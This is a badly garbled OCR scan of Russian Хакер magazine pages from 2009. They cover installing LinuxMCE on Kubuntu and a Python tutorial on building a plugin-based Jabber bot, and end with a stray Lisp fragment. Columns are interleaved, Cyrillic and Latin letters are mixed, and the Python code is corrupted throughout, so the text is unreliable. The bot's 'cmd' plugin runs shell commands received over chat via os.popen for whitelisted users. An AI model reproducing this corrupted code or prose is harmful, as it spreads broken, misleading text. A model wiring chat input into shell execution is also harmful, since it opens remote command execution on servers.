linuxmce, который будет использоваться для доступа по 55Н.

192 168.80.254. Можно изменить эти настройки. Напри­

хода в

маем и

Kubuntu

нажи­



- обычный 3,9 Гб и Oual Layer-7,0 Гб. Второй

ту пеtwогk optrons mапuаlLу» и устанавли­

ваем настройки вручную. Затем указываем зеркало, с

80.1­

После чего все необходимые файлы скопируются нахард. В

мер, если

этом варианте будет использован весьдиск, данные на ко­

ОНСР нет необходимости.Теперь следует определиться

LinuxMCE будет единственнымхостом, тогда В

для

тором уничтожатся. Вариант мультизагрузки изначально не

стем, как будет использоватьсякомпьютер. При помощи

возвращения обрат­

предусмотрен; правда, инсталляторлегкообмануть !смотри

переключателя выбираем один из двух предложенных

но в LlпuхМСЕ.

врезку).

вариантов.

Установке с СО тоже не сложна. Записывать скачанные

• Ргimапlу used as а РС - по умолчанию загружается

• 25 ма рта 2009 года

образы на диск необязательно. Ставим Kubuntu

Kubuntu, но можно переключиться в LinuxMCE:

завершена подде­

монтируем С01 из LlnuxMCE в каталог /mnt:

ржка ·UЬuпtu

7.10. затем

• Adedlcated LinuxMCE -

наоборот.

Кстати. первый варианттакже можно использоватьна ком­

7.10. $ sudo mount

Lil1\D:ИСЕ-СDl-iЗ86-rс2.iso

/mnt



loop

• Для установки

пьютере, выполняющем роль

Media Oirector·a и обычного

десктопа

исходного кода

и -устанавливаемнаходящийсявнутри пакет тсе­

На зтом все. Теперь мастер попроситуказать. где нахо­

LiпuхМСЕ выполни

iпstаllег,

дится СО 1/С02 и установочный Kubuntu 7.1 О Oesktop

кома нду

«svn

Са м ый удобны й вариант -

со

httр://svп .ll Пllхmсе.

$ sudo dpkg -i /rmt/mce-il1staller_2. О

.1-1_iЗ86 .д.еЬ

соm/рlutо/tгuпk/

задать расположе н ие на харде

соответствующих 150-0бразов, тогда можно начать процесс установки. оставить компьютер и заняться своими делами.

После этого на рабочем столе появится значок «Iпstаll

Если выбрать "It's in СО Drive», придется последовательно

LlnuxMCE". Чтобы начать процесс установки, просто щел­

вставлять каждый диск в при вод. В Гlроцессе установки мо­

• Обзор Myth ТУ читай

каем по нему Да, во время установки будут перезаписаны

гут появляться сообщения об ошибках, обычно они возника­

в статье «Строим до­

некоторые системныефайлы. Всякое бывает. поэтому на

ют при тестировании драйверов к различным устройствам,

машнюю медиастан­

«боевой» системе лучше не зкспериментировать.

Если установка не закончена с Еггог. то на них обращать

цию» В июльском

Установка выполнена в виде нелокализованногопоша­

внимание не стоит. на результат работы они не влияют По

номере журнала за

гового мастера. В первом окне получаем сообщение о

окончании будет запрошена перезагрузка.

2007 год.

том. что обновление будет произво.циться из репозитария

linuxmce»

~

090

LiпuхМСЕ [в Hel-l содержатся все необходимые пакетыl,

НАСТРОЙКИ ПОСЛЕ ПЕРЕЗАГРУЗКИ

а не

Первая загрузка несколько затянется, поскольку будут

Ubuntu. Наэначениевторого шага, предлагаю­

щего установить медиапроигрыватель.путает многих

проверяться И дона страиваться все сервисы. Далее

На самом .целе здесь предстоит определиться, в каком

запустится мастер настройки ау.цио и видео

- «АУ

ХАКЕР

00

11261

09

'.liiЩ;'f·Ш.i1iщ.;

1",1. l.ОСЭltоп

,e:dIt

:!liew .IIаоlcп)Qr1cs

Q Q. Q. Q 0:

~-------,---~--­

1001s 5.ettlngS' !::!elp

"

D G[hitP;1J12~_~~o.i~~to~dmlnti~:!~~~~_._ ...

~! ;;uпu.:чСЕ

--­ -

! -­

Ba.slclnto

AdV/lП«11

W!.lold

~ \ШI1

-

Att10П11111<111

--­

---.м)г:i;;-~--.,т­

GRAPHICAL А5РЕСТ

SClI;UI

STEP 2

'TolccolII

!1=

~ Devlc4i!5

~t ~y~ . . . . ~Ii+ Alph~ bl4n.JadUli,tHItI.<. But bt'ibt. (/'м:IO~"""t r(!~1'IO'" t~ w«l:s.;,nO tN P-4tJ'"~"",nt., ~t ~.Itр:llp6utolIQП'I',"Q""....цt.n,j.~.рhp,\J1

о,"",

llilI.<Ш

~

Wlzard I LlghUng Scenarlos

~

Q!I
МАСТЕР HOUSE SEТUP WIZARD ПОМОЖЕТ

!d:IJЫIO

СКОНФИГУРИРОВАТЬ ПОДКЛЮЧЕННЫЕ УСТ­

'"""'"

l.!9t!!>

!то аtюп Р'У(")

~

Su!W~lance Саmегщ

N(){e: Tne nrst Ilghting scenario 1.. Ih.:: "Dеt3Шt Otl' 'аг th<Jt гоот, mеЗпing lightingtaItO'N-У'1u, v.rn:n you еntег the room,lttattir1>1 sселзrjo-МII ое ex~ OFF' v.t1~n уоч leave tne room. YOU SnOuld make ~ l'irи sce:natio tum о second $сепаriO tumtnem ort. The restot the sc!!:гI3r1os сзп O~ aпylI\ing Bzthroom

ВJJшtl!!Jtl

GCDetlcserla!QrY!(~ ЕI99ш!зпWtzзrl1

РОЙСТ8А

Aut:ag~e(
но

sc:.naI105

scenar1os: N/A

ПОСЛЕУСТАНОВКИLINUXMCE

Ijgnting scenar10s tor Ihls roOnl.

ВЕБ-КОНСОЛЬ УПРАВЛЕНИЯ

ЗАПУСТИТСЯ

LINUXMCE­

A!VWIZARD

ADMIN WEBSIТE

в

1-1 их

можно запускать МСЕ, а также управлять некото­

рыми его параметрами и просматривать журналы Для запуска

LlnuxMCE во вкладке «5tart» нажимаем «5tart

LlпuхМСЕ» или

,,5tart

Соге

services»,

если НУЖI-1Ы только

сервисы, предоставляемыеСоге. Для автоматического их старта при открытии

ви флажки В поле

Launch Manager просто уста 1-10­

«Autostart Sеttiпgs». Запуск займет • официалы-1йй сайт

l-1еКОТОрое время, по прошествии которого заПУСТИ1'СЯ

еще один мастер, на этот раз - House 5etup Wizard [в

проекта LinuxMCE­

процессе эксплуатации его можно вызвать из меню

liпuхmсе,огg.

«Misc

- Advanced ОрtlОПS - Setup Wizard»]. На первом шаге проверяются настройки видео и звука; если видно иэоб­ ражеl-1ие, и слышеl-1 голос, нажимаем «Next>' и получаем

ОРБИТЕР МОЖЕТ ИМЕТЬ НЕСКОЛЬКО ВА­

РИАНТОВИНТЕРФЕЙСОВ

для LiпuхМСЕ.

влияют.

-

огромное количество

может разделиться на два:

информации -

House Setup Wizard и Media

Player Wlzard. Первый помогает настроить использова­

wiki.

[iпuxтсе.огg.

из списка страну, указать количество И l-1азначение

• Неофициаль­

KOMl-1ат, l-1астроить системы уп равления светом, безо­

I-1ЫЙ русский

Kubuntu

пасности, параметры VolP-провайдераи РVR-систему

сайт

они действуют только

(MythTV или VOR). Если некоторых устройств в системе

lli1JlZ.D:!.<;.§.J:!J.

на девять шагов. На настройки рабочего стола

l-1e

список устройств удаЛВНI-10ГО управлеl-1ИЯ. Далее мастер

ние системы,ДЛЯ чего ПОl-1адобится ввести имя, выбрать

Wizard". Сам процесс состоитиз трех зтапов. разбитых зти установки никак

• WiKi проекта LinuxMCE содержит

8 последующем мастер можно запус­

нет, нажимаем

LlnuxMCE­

«Contlnue without опе». Мастер укажет

ЛОГИI-1 и пароль для регистрации и получения готовой

• Интерl-1ет-проект

- A!V Wlzard (или в ко маl-1ДНОЙ строке /u sr/plu to/bin/

почты. Теперь в

«УМI-1ЫЙ дом своими

AVWizard_Run.shl. Вl-1ачале при помощи трех окон

указываем СIlИСОКУСТРОЙСТВ и методы управлеl-1Иfl ими,

выбираем видеОИl-1терфейс[VGA. OVI/HDMI. S-Video

На nослеДl-1ем шаге МОЖl-10 устаl-10ВИТЬ ряд программ

тить повторно из меню

LinuxMCE,

выбрав Аdvапсеd

Media

РlауегWizагdдля каждой комнаты

и такдалееl, разрешеl-1ие и частоту развертки. После

Iw32codecs, OVO С55 и другиеl. Если ПДУ дЛЯ какого-то

проверки правильностизтих установокбудет запрошен

устройства отсутствует, нажимаем «Ооп'! сопtгоl ту ... »

выбор одного из трех вариантов Orbiter

И идеl~ дальше В процессе выбора устройств будут уста­

User Interface

IUI). Самый простой - "Static images, по overlay

l-1авливаться все необходимые драйвера, при этом окно

(tlghtweightl" - не требователеl-1 к производителы-1стии

сообщеl-1ИЙ будет чуть перекрывать рабочее поле мастера

руками»

- hosm.ru.

видеоподсистемы и будет работать на всех платформах.

[не очень УДОбноl. По окончан и и щел каем «Start using

~

Наиболее ПРОДВИI-1УТЫЙ

the system». Для

При установке

- «OpenGL with alpha blепdiпg

перехода в КuЬuпtu используем ссылку

warning DVO­

!high-endl» - потребует NVidia 6/7/8/9ххх с l-1e Mel-1ee 128

«КОЕ Oesktop» или нажимаем ; если НУЖl-10

Мб ОЗУ. После выбора одного из режимов с поддер­

вернуться обратно в LiпuхМСЕ -

жкой

После установки доступен LiпuхМСЕ Admin Webslte, КОТО­

жестком диске будут

кнопки "Test". На шаге «Adjust Image 5ize" указываем

PbIl~ можно открыть, обратившись по адресу http://core ip/

ун ичтожены, мулыи­

правильный размер изображения. Выбираем разъем, к

pluto-adrnin или l-1ажав кнопку В Launch Manager. Отсюда

загрузка систе"" не

которому подключены аУДИОКОЛОI-1КИ, и тестируем вывод

можно произвести все настройки. о которых говорилось

предусмотрена.

звука а обычном режиме, в Dolby и ОТ5 IOigital Theater

ранее, и по ссылке

50uпd] -

для

OpenGL нужно протестировать работу нажатием

послеДl-1ие два будут достуПI-1Ы в зависимости

.

варианта

LinuxMCE

все данн ые на

l-1a первой странице скачать орбитеры

Windows и 1-1 eКOTopbl е другие утилиты.

от выбраl-1НОГО аудиоразъема. Попутно выставляем

нужную ГрОt-1КОСТЬ. Смотрим итог. Если все в порядке,

ЗАКЛЮЧЕНИЕ

l-1ажимаем

Возможностей у LiпuхМСЕ довольно MI-10ГО, позтому пер­

«1 agree»

и ждем некоторое время, пока будут

про изведены соответствующиедоустаl-10ВКИ.

BOl-1ачальную настройку должен производить человек,

ТепеРЬТОЧl-10 все Если был выбран вариаI-1Т«РГtmаГllу

как минимум понимающий, что ОН делает. Что касается

used as а РС". загрузится КОЕ, на рабочем столе которого

последующей зксплуатации, то

будет расположена иконка для запуска LinuxMCE Lаuпсh

даже у чайника

Мапаgег. Менеджер содержит несколько вкладок,­

КI-10ПКИ!Х

ХАКЕР

06 /126/ 09

-

ol-1a

не вызовет проблем

выбирай устройство да l-1ажимай

~

091

+++

>> cod;ng

+++

РОМАН

.+++

I

.. SPIRIT.. ХОМЕНКО

НТТР:/ГТUТА'МС.СОМ

I

~

"+++

.+++

----

---~

-+++

.+++

~

РОБОТ ~

а

СХЕМДРДБОТЫДЖДББЕРД

IIH++

,ЛЯ

-+++

.+++

Программимкрутой jаЬЬег-ботс поддержкой +++

+++

плаГИНО8на Python'e Британские ученые давно доказали, что собственным джаббер-ботом

должен обладать любой уважающий себя администратор.

-+++

Еще бы, ведь это он спасет в экстремальной ситуации, когда под рукой

нет putty, зато есть джаббер-клиент [ты ведь уже завязал с аськой, -+ ++

.+++

1'1-+++

правда?]. Пришлотепло,а вместе С НИМ - " выезды на

ноута/субноутанемысл"моll,но я оказался не

от РегL·а. разв"тие которого де-факто пре­

природус шашлыками.И пока я смотрел на

таков, и на зтом п"кн"кдля меня закончился.

кращено) системный 'В отличие от вебовского

костер, предвкушая начало отдыха, зазво­

Вечером я вспомнил, что на телефоне у меня

РНР) скр"птовый язык программирования.

н"л телефон (в соответстви"с пр"каэаМ!-1 он

установленджаббер-месенджер,и, если бы на

Выбор протокола сделать еще проще, ведь

должен быть при каждом сотруднике мили­

серваке присутствовалсоответствующийбот,

у джаббера в этом плане нет конкурентов­

ци" на случай 'гревог" "л" команды «сбор»I.

который могбы исполнять его команды, летний

аська не подходит ввиду отсутствия на'ГИВ­

3вон"л полковн"к,срочно вызывающийменя

отдых бы не обломался. «Н"когда не поздно

нога шифрования И цеНТРдлизованности lих

на работу и требующий выдать ему на серваке

начать», - сказал себе я и принялся за работу.

сервак может лежать или капиталистическое

новый пароль. Работы на пару минут, но где же

+++

! -+++

начальство опять начнет что-то мутить со

я в лесу достану комп с "нетом? Матерый гик

PYTHON &JABBER

сменой протокола].

портативнуюЭВМ себе, наверняка, найдети

Почему

Юзать на Питоне джаббер-протокол мож­

там (пить, гулять" морально разлагатьсябез

- единственный развивающ"йся [в отличие

• 092

Python? А потому,

что зеленый змий

нодвумя способами: простым и сложным.

ХАКЕР

06 /1201 09

юзеров, имеющих доступ к админке Iпароли

ЗАПУСК БОТА

будутхраниться там же!.

Перейдем к использованию хтррру и эапуску

Удобную работу с IПI-файлами В Питоне обе­

бота. Сперва создадим объект Jid

спечивает библиотека

передав имя пользователя,

ConfigPar5er. Для чте­

ния пара метров мы используем две функции

оттуда. Первая,

read -

для чтения конфигура­

ционного файла. и,~я которого передается как

oTxmpp.J 10,

взятого из нашего

загруженного конфига. Создание главного объекта

bot проиэводится

01" xmpp.Client с пере­

дачей домена, на котором находится юзер, и

чтобы

пустым списко,~, чтобы на экран не выводилась

достать какой-то параметр. Она принимает в

отладочная информация [тру-хакеры работают

качестве параметров секцию и имя параметра.

только методом научноготыкаl.

параметр. Вторая функция,

get, нужна,

Рассмотри,~ зтуфункцию:

ЛОГО ДЖАББЕРА def loadConfig () :

import

СопfigРаrsеr

JID (config l ' login' ] )

j id =

хтрр.

Ьос

Х(1)рр.Сliепt

'"

(jid.

getDomain{) ,debug=(j)

config = \

"Сложно»

- зто путем чтения документации

[xmggorg/rfesJ и с использованием сокетов.

Если хочешь разобраться с протоколом - зто

способ оптимален, советую посмотреть, как

сдела н бот от

eLWAux [исходники

есть на

ConfigParser.ConfigParser() 10gin = config. get ('

Чтобы иметь полный контроль над ботом в

любой точке проrраммы [и в главном цикле, и в

config. теад ( 'config·. ini' ) соппесt'

,

плагинахl, мы будеf~ передавать Hall.l. объект

bot

повсеместно. Но ведь конфиг, СПИСОК плагинов

'login') password = config. get ( 'СОПпесс' , , password ' )

идругая служебная информация также может

диске].

Легкий путь подразумевает использование

allow.J)asswor·d =

знать, какие плагиныустановлены)? Да. и

уже написанных библиотек

Их немало, на­

ную инфу. Так, конфигсохраним строкой:

'allow.J)assword')

• 'l'wisted Words

user_no_pass = config .get ( permission 1, usеr_по-раss 1)

(twistеШ"аtriх.соm!рrоjесts!wоrds);

usеr_по_раss =

1

f

Можно законектиться и пройти аутентифика­

'}

(jabberpy.sourceforge.net) ;



bot.. config = config

I

\

usеr_по-раss.sрlit('

• jabber.py

help нужно

поэтому В объектЬоt мы сохраним всю интерес­

config.get{'permission' ,

f1ример:

по надобиться (например, плаrину

цию:

rеtщ:n

Х11\рррру

(xmpppy.sourceforge.net} .

Выбор определяется в основном личными при­

( '10gin' : lоgiп, 'password ' :password,

bot.. соппесс ( )

'al1ow_password' :allow_password,

bot.auth(jid.getNode() ,

bot.config[

'usеr_по-раss l :usеr_по-раss)

'раss<юrd' J)

страстиями. Мне больше понравилась хтрррру оТ Алексея Нежданова. Ею мы и ВОСГlOльзуе,кя.

Эдесь МЫ читаем переменнуюсо списком

Прием сообщения в хтррру реализуется

юзеров, которым разрешен доступ в админку,

через привязкуфункции К событию прихода

АРХИТЕКТУРА

и превращаем В список методом 5plit по за­

сообщения. Сначала нужно создать функцию,

Итак, задача поставлена: написатьджаббер­

пятой как разделителю. Далее все пара метры

к примеру,

мы возвращаем упакованными В ассоциа­

Rеgl5tегНапd

'бот, способный принимать и исполнять команды. Нет, стой, зто слишком просто.

тивный массив (на языке Питона

Усложним все и напишем полноценный бот

Теперь конфиг можно прочитать:

-

message, а потом, методом bot. ler зарегистрировать ее'

словарь].

bot.RegisterHandler('message' ,

с поддержкой плаГИН08, один из которых и

message)

config =

решает задачу администрирований.

lоаdСопfig{)

С истема у нас будет состоять из бота [Ьо t.

Теперь в цикле необходимо вызвать

ру), файла конфигурации [сопflg.iпiJ, папки с

Process[1),

плагинами

Ipluginsj и библиотеки

bot.

который принимает входящие

хтррру. Бот

будет иметь два типа плагинов. Представи­ тели первой группы доступны всем, второй

­

лишь избранным, по списку или паролю.

При проектировании системы с плагинами всегда встает вопрос об их полномочиях по

управлению ботом. С одной стороны, чем

ПРОЕКТ JABBER Jabber-сисrема MrHoBeHHoro обмена сообщениями и информацией о uрисyr(:твии

меНЫliе прав плагину мы даем, тем проще

на основе

их писать, но и возможности получаются

1998 года и стартовал С разработки сервераjabberd. В настоящий момент есть некото­

ollipblToro uротокола ХМРР. Проект был основанДжереми МИJUIером в начале

более ограниченными Позтому пусть лучше

рая неuонятность в отношении терминовjаЬЬеr и хтрр. Даже в английской Википедии

плагины будут низкоуровневыми Трудностей

cjabbel' стоит uереадресация на хтрр. Эта непонятка в первую очередь связана с тем,

мы не боимсй.

что под именем хmрр uротокол был стандартизирован в ШТЕ Каждый uользователь в джаббер-сети имеет уникальный идентификатор -Jabber ID (сокращенно ЛD). Адрес

СИСТЕМА КОНФИГОВ

ЛD содержит имя пользователя идоменное имя сервера, на котором зареrnстрирован

Программинг бота начнем с реализации

пользователь. Подобно адресу электронной почты, они разделены знаком@. Пользо­

чтения конфига. который будетхраниться во

ватель может иметь одновременно несколько подюпочений, для различения которых

всем известном iпi-формате в файле

используется дополнительное значепие ЛD, называемое «ресурсом» И добавляемое через

ini

config.

[кстати, амеры весело произносят«iпi» как

«аЙнаЙ»). В секции

connect мы

разместим па­

раметры доступа к ацаунту, на котором будет

висеть бот, а в секции

ХАКЕР

06 11261 09

perrrllsslon -

список

<:леш вконецадреса.!{ uримеру, пусть полный адрес пользователя будет lIser@example. com/work, тоrда сообщения, носланные на адрес usеr@ехаmрlе.соm,доЙдyrнауказан­ ный адрес вне зависимости от имени ресурса, но сообщения для [email protected]/work

дойдут только при соответствующем ПОДJUIЮченном ресурсе!

~

093

1'" -+++

»

I

cod;ng INTER~~ET

ПОД,РОБН'ЕЕ охмРРРу

ССЫЛКИ

НАОБЪЕКТЫ

И ПЕРЕМЕН'НЫЕ

ULIE \

Библиотека хтррру содержит мпого полезных объектов,

юоанс, про который часто забывают_ Рассмотрим прнмер раБоты

Объект JID ДЦЯработыс Jabber т. При создапиипринимает

сперемеииыми:

параметр-JаЬЬеr-идеитификатор.

Методы:

ргiпt а

print

Ь

• gеrDоmaiп, возвращает домен; • getNode, возвращаем имя пользователя; • getResource, возвращает ресурс.

#1

#2

Ои выведетна экран 1, потом

2, и это закономерно. А что, если

перемен.иая будет в объекте? Посмотрим:

главный объект Client. При созданиипринимаетдомеп джаббер-сервераи перемеинуюДJIЯ отладочнойинформации, Методы:

• сопnесt, подключеиие к серверу; • auth, авторизация,припимаетпараметры: имя пользователяИ

class Obj () :

def _init_(self) :

pass

пароль;

--+++

• а

= Obj{); a.var = 1;

pr'int print

-+++

а. Ь.

Ь

=

а;

iq) и имя фУНКЦИИ; • sепd1пitРrеsепсс, отправка начальных запросов, нужно запу­

var #2

var n2

скатьпосле авторизации;

Сюрпрпз! На экран выводятся сплошные двойки! А случает­ ся это потому, что операция

--+++

--+++

-+++

• sепd, отправка сообщений, принимает объект Message; • Process, запустить обработку входных сообщений; • disconnect, отключиться от сервера.

«=" при работе с объектами не

копирует их, как при других типах переменных, а создает

Message- объектсообщения.Прпнпмаетпараметры-

ссылку.

юзера И текст сообщения,

В контексте нашего прпмера ЭТО означает, что переменную

Методы:

bot мы обычно передаваликак бы по значению, а деле как ссылку,

• getBody, возвращает текст сообщения; • getFTom, возвращает имя пользователя,

на самом

сообщеf1ИЯ и обрабатываетих Разумеется. веЧf1ЫЙ цикл здесь

f1e

RеgistеrНапdlеr, привязкафункцнй к событиям, принимает

параметры тип события(mеssаgе, рrеsепсе,

b.var' = 2

нужен. поэтому в свойстве опllпе смело запишем единичку. и

будем крутить цикл дотех пор. пока эта единичка

f1e

изменит свое

имя

от кого сообщение,

bot . оп1 ine = 1 ,.,hi1e bat, on1ine: bot, Pr'ocess (1) bot.disconnect()

Зf1ачеf1ие;

-+++

--+++

ПIРОЦЕДУРАОБРА'БОТК~

ВХОДЯЩИХСООБЩЕНИИ

--+ ++

def message(conn,mess) : globa1 bot text = mess. getBody ( ) #если сообщение служебное

#Достаем !~Я пользователя

-

выходим

if ( text == None ) :

return

Из вхоцящего сообщения достаем команду

command

~

user = filess. getFrom ( ) user = str (user-) . sp1iL (' /') \1ser' = \lser [О] iFЕсли юзер не адиин

-+++ text.sp1it ( .. )

command = command [ О]

-

говорим «команды нет).)

if \lser' поt in bot.config[ 'user_nO""pass']; text = "wI'ong соmшапд. try 'help'" bot. send (хтрр .Message (filess. getFrom () ,text) ) геtuсп

"'Г+++ liесли команда в списке nyбличных

-

запускаем

if command inbot. p1ugins [ 'public_comrnands' ) : #Запускаем команду

+++

r\lnPlugin (command, bol: .mess)

ret\lrn

.~

094

#Если ::<;.оманда есть в «админских»

i f command

iп

bot, p1ugins [ , comrnands' ] :

гuПРl\lgiп(command,

\11 .'

Рассмотрим некоторые из них.

в Питоне (да и в другихязыках, например,в РНР) , есть один

a~1;b=a;b=2

,

bot. mess)

else: text = "wrong соrпmапд. (ГУ 'help'" bot.send(xmpp,Message(mess,getFrom() .text») ХАКЕР

06 /126/ 09

А

» cod;ng

I

I

~

U1.Л: \

.~~

\

\ \

.. I><,.. ,.:.н.,

··(..·,.".1'·"

'lI-!

i

.

.........,.....~ .;.",...... <;~~,;

l

-1

ь..-­

:~ rr~~~ i§;~:;i:~::'[!:,T:7:~::, Ё@ '~.E

I

! i

..

о

O'REILLY'

КНИГА ПО ДЖАББЕРУ

NET8EANS ДЛЯ PYTHON

Для остановки бота нам будет достаточно изменить

8

1 на

ОТЛИЧНАЯ

О.

еУР080ЕПИТОН08еКОЕЛОГО

IDE

imporc

хтрр

результате, он корректно отсоединится от сервера и за­

вершитсвою работу.

def init () :

KorAa наш бот запущен. мы можем вернуться к написанию

return

О

фУНКЦИИ обработки входящих сообщений. Простейший вариант. способный принимать сообщение и реагироватьна сей знаменательный факт. выглядит примерно так:

def run(bot,mess}:

bot. send(xmpp.Message (mess.getFrom() ,

rneSS.getBody()

Напишем функцию,загружающую наши плагины. Поскольку

(шеss. getвody ()

if

== None ) :

]lnks

net - сайт библиоте­

def message(COnn,mess):

global bot

~

xmpppy.sollГceforg~.

)

ки хтррру.

мы уже решили. что ОНИ ДОЛЖНЫ находиться В папке рlugiпs. то взтом каталоге нам придется поместитьnустоЙфаЙл_iпit_.ру

rеtUП1

- та ково требование Питона. Это шаманское действо позволит нам ИМПОРТИР08атьфайлы как модульфункциеЙ_imрогt_.

bot.send{ хтрр. Message

(mess . getFrorn () , 'helJ.o' ) )

Итак. нам нужно загрузить все файлы. размещенные В папке

plugins !кроме _init_.pyJ в какую-то nеременную.Кроме В гlачале этого участка кода мы командой «global bot» по­

того, во время инициализациимы создадимдва списка,

лучаем доступ к объеК1у нашего бота. Далее идет обработка

которые будутсодержать реестр загруженного.В первом

входящего сообщения, где с помощью команды mess.

(public_commands) будут nеречисленыте плагины, которые

getBodYMbI получаем сообщение. Если входящее сообщение

можно запуститьбез авториэации.а во втором Icommandsl

~

dvd

равно None. это означает, что пришла служебная команда

- элитные (тру. VIP] - админсхие плагины. В качестве ре­



На диске ты

(допустим. про то, что юзер что-то нам печатает). Такие со­

зультата работы функция вернет нам ассоциативный массив

найдешь полные ис­

общения мы обрабатывать не настроены, и реакция на них

с nлагинами и списками:

ходники бота.

однозначна

выход изфункции.

-

В следующей части Марлезонского балета мы воспользу­ емся методом

send,

отправив в отее1' простое сообщение.

• Видео. иллюстриру­

def 10adPlugins():

import

ющее работу с ботом.

ОБ

Этот метод в качестве параметра принимает объект Message

commands = []

ждет тебя та м же

библиотеки хтррру. При ее создании мы передаем два пара­

public_commands = []

на нашем

метра' первый

второй

-

-

­

DVD

кому нужно отправить сообщения, а

текст сообщения.

#Пере6ираем :е:с:е файл

1

ИЗ пar:RИ

plugi:os

for fname . n os. listdir ( 'plugins/ ' ) :

ПЛАГИНЫ

#ЕсJТИ файл заканчизгется H<:J '. ру'

Простая поддержка плагиноо реализована в самой

j

f fname. endSNi th ( , . ру' ) :

библиотеке хтррру. но мы сделаем ее по-своему. написав

собственную архитектуру плагинов (как минимум. с блэкдже­

~Обрезае~1 последние

KOM!I. Сначала

plugin_narne =

определимся со структурой плагина. Каждый

Еnаrnе!

плагин будет иметь название. аналогичное исполняемой

tfЕслJ.1 и.ня файла не

им команде. К примеру, если мы хотим создать nлагин,

i

Е

3

буi:ВЫ

:-3]

'_init__ 1

plugin_name ! = '_ini t_· :

который на команду «echo some text» посылает сообщение с зтим же текстом, то плагин должен будет называться echo

:#Загружаен nлаrи..i-f в :1ереыенную

и раэмещаться в файл echo.py в каталоге plugins. В каждом

pl\.1gins = _irnport_( 'plugins.' +

nлагинедолжнысодержатьсядве функции. Одна. iпit, может

plugin_name}

проводитьнекую предварительнуюинициализациюи обяза­ тельно возвращать 1. если плагин можно использоватьлишь

~ДостаеN. ппdг:и"':-: с Г!ере:-!е ~НОЙ

админам, и О, если всем юзерам. Вторая же обюательная

plugin = getattr (plugins, plugin_name)

функция

- run - s

качестве входного параметра принимает

ссылку на наш бот и оходящее сообщение. К примеру, плагин есtю EJыглядиттак:

ХАКЕР

06 /126/ 09

i f plugin.init():

~

095

1'"

+++

>> ,::oding

INTERNET

,

MONTAGUE .NET

I

F::-~

-------

ОБРАБОТКАСООБЩЕНИЙ

commands. append (plugin_name)

Осталось изме~IИТЬ функцию me55age, которая обрабатывает входящие

else:

сообщения. Логика ее ра боты та кова:

public_commands.append(plugin_name}

• Выделяем из входящего сообщения команду [символы от начала до пробелаl,

#Во:?вращаем аССО~Иа'1'ианый словарь

• Смотрим fiаличие команды в списке «публичных»,

return

,-+++

'plugins' :pl1.1gins,

• Если к публичным ofia не относится, стало быть -

rСОйLmаnds' ;con~ndSt

веряем авторизацию и факт наличия команды в списке

'Р1.1Ы iс_сопunапds'

«админских»

:publ iс_соmшапds

про­

• Если команда нашлась, то запускаем ее. 8 противном случае­ сообщаем юзеру о прискорбfiОМ факте отсутствия кома:,ды в fiаших списках.

Кстати, рассмотрим ОДИfi момент Имя польэователя, которое

«ЗАДАЧА ПОСТАВЛЕНА:

возвращает команда me5s.getFromlJ, не всегда возвратит праВИЛЬfiое значение

НАПИСАТЬД>КАББЕР-БОТ,

обрезать, например, вызвав метод строки splitU') и потом взять первый элемент списка. Полностью функцию смотри на соот­

И ИСПОЛНЯТЬ КОМАНДЫ.

ветствующей врезке,

НЕТ, ЭТО СЛИШКОМ просто. УСЛОЖНИМ ВСЕ И НАПИШЕМ

. - +++

,-+++

1+++

ПОЛНОЦЕННЫЙ БОТ С ПОДДЕРЖКОЙ ПЛАГИНОВ, ОДИН ИЗ КОТОРЫХ

• Обрезаем первые 4 символа входящего сообщения [к примеру, cmd ls ~ l5). • Передаем команду в цепочкуфункций 05.рореп[сmd] read(l. • Получен fibI й резул ьтат кон вертируем Iпри fiеоБХОДИМОС1"иJ в utf-8lпри

imporl.

хтрр

import

08

«fia лету" - советую подробfiО в ней разобратьсй. После getattr с указанием в

первом параметре имеfiИ пере­

меНfiОЙ, где хранятсй плагины, а во втором параметре -

def ini t () : relurn 1

имени

плагина. В результате, функция возвращает сам плаГИfi, из которого

def

ruп(Ьоt,щеss):

уже потом можно вызывать функции, в нем fiаходящиеся. К примеру,

cmd =

В вышеуказаfiНОЙ фУfiКЦИИ загрузки мы запускаем для каждого из

ста

них фУfiКЦИЮ

,-+ ++

«cmd», а ПРИfiЦИП его работы будеттаков:

Вот как это выглядит в строках сурового программного кода:

загрузки в перемеfiНУЮ рltJgiП5 плаГИfiа, его оттуда МОЖfiО BbIH1fiYTb

[-+++

плаГИfi, ис­

• Возвращаем пользователю результат.

АДМИНИСТРИРОВАНИЯ».

функцией

-

полняющий системные команды. Наречен он будет говорящим именем

UNICODE].

И БУДЕТ РЕШАТЬ ЗАДАЧУ

плаГИfiОВ

ИСПОЛНЕНИЕ КОМАНД Ну, вот и настало время закодить «виновника торжества»

инициализации бота мы не указывали кодировку, поумолчаниюэто будет

Эта фУfiКЦИЯ важна длй пони мания работы Питона в плаfiе загрузки

.-+++

эрения проверки авторизации).

Джаббер). которое нам не НУЖfiО. Стало быть, ресурс мы должны

СПОСОБНЫЙ ПРИНИМАТЬ -+++

Ic точки

Почему? Ведь там может быть имя ресурса feмотри врезку про

тевв

. getBcdy ( )

= сщd[4:]

mit_ В зависимости от результата имя плагина добав­

лйем или В список РUЫIC_соmmапds, или в

commands.

НаписаfiНУЮ

o1.1tp1.1t =

ОВ.рореп(стСО

.read()

загрузку плагинов можно заюзать И при этом записатьрезультатв соот­

ветствующеесвойство бота:

if

по!:

isinstance(output,

UТlicode),

output = unicode (OtltP1.1t, '1.1tf-8' ,'ignore')

,-+++

bot.pl1.1gins = loadPlugins() bot. send(xmpp,Message (mess.getFrom{) ,Otltp1.1t)) Чтобы вызвать наш плагин, fiапишем малеfiЬКУЮфункцию, которая будет принимать имя

KOMafiAbI, ссылку fia бота и входящее сообщение:

i-+++ def

пшРlugiп (соrnrl1зпd,Ьоt ,mess)

:

Мы реализовали все. что хотели, оставив задел для неогра­

plugin = getattr (bot. pl1.\gins [ 'plugins' ) ,cornr'1and)

ничеНfiОГО расширения функционала при помощи плаГИНО8.

plugin.run(bot,mess)

На диске. кроме вышеперечислеfiНЫХплагинов, содержатся и

+++

j-+++

HAPPYEND На этом разра ботку бота МОЖfiО считать завершеfiНОЙ.

плагины бонусные. А чтобы продемонстрироватьзапуск и работу

Эта фУfiКЦИЯ, исходя из имени плагина Iпараметр commandl, вытаскива­

готового бота, я записал видео. Если что-то будет непонятно­

ет его из bot.plugln5[·plugin5'] и запускает функцию run.

спрашивай! I

~

096

ХАКЕР

06 1126/09

~

»

c:oding

cons а 3))

; (43 (f~

'"1

defun two-funs [х)

(setq а 43]

[List а [cons а 3JJ

; [43 [43. 3J]

[function (lambda [\ '1

[setq funs [two-fun" [list [quote а) [quote (cOliS а 3)) ; [а (cons а 3]]

